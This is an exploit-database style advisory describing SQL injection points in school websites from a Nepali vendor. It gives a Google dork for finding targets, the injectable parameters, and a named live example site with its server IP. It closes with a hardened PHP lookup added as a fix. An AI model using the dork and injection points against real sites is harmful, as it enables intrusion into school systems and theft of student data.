
Technology Software Nepal SQL Injection Vulnerability

Author: KingSkrupellos, Published: 11-01-2019
# Exploit Title : Iceberg Technology Software Nepal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : icebergtechnepal.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''Developed by:Iceberg Technology'' site:edu.np
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#########################################################

# Admin/Teacher/Student Panel Login Path :
**************************************

/teacher/index.php
/student/index.php

# SQL Injection Exploit :
*********************

/news.php?id=[SQL Injection]

/photo.php?edit=[SQL Injection]

/about.php?Title=[SQL Injection]

/admission.php?Title=[SQL Injection]

#########################################################

# Example Vulnerable Site =>
**************************

Note => (192.185.142.207) => There are 57 domains hosted on this server.

[+] basiclearning.edu.np/news.php?id=42%27 =>

[ Proof of Concept ] => archive.fo/5ILQG

#########################################################

# SQL Database Error :
********************

Warning: mysql_fetch_array() expects parameter 1 to be
resource, boolean given in /home/basiclea/public_html/news.php on line 24
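
Added example, not part of the original advisory and not the vendor's code: a hardened lookup for a numeric parameter such as news.php?id=, replacing string-built queries and the unchecked mysql_fetch_array() call that produced the warning above. The table and column names (news, id, title, body), the function names and the in-memory SQLite database are assumptions used so the example runs offline.

```php
<?php
// Added example. Schema (news: id, title, body) and function names are assumptions.
// The mysql_* extension seen in the warning was removed in PHP 7.0; PDO is used here.

function open_db(): PDO {
    // In-memory SQLite keeps the example offline; a MySQL DSN is used the same way.
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    // Constructed sample row.
    $pdo->exec("INSERT INTO news VALUES (42, 'Constructed title', 'Constructed body')");
    return $pdo;
}

function fetch_news(PDO $pdo, $rawId): ?array {
    // 1. Allow-list the input: a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller answers 400/404; nothing reaches the database
    }
    try {
        // 2. Bound parameter: the value is never concatenated into the SQL text.
        $stmt = $pdo->prepare('SELECT id, title, body FROM news WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // 3. Log server-side; never echo driver errors or file paths to the client.
        error_log('news lookup failed: ' . $e->getMessage());
        return null;
    }
}

$pdo = open_db();
// Constructed inputs: one valid id, the quoted value from the report, two malformed values.
foreach (['42', "42'", '-1', 'abc'] as $input) {
    $row = fetch_news($pdo, $input);
    printf("%-8s => %s\n", var_export($input, true), $row ? $row['title'] : 'rejected / not found');
}
```

Setting display_errors = Off in php.ini on production hosts keeps warnings like the one above, including the script path, out of responses.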

#########################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#########################################################
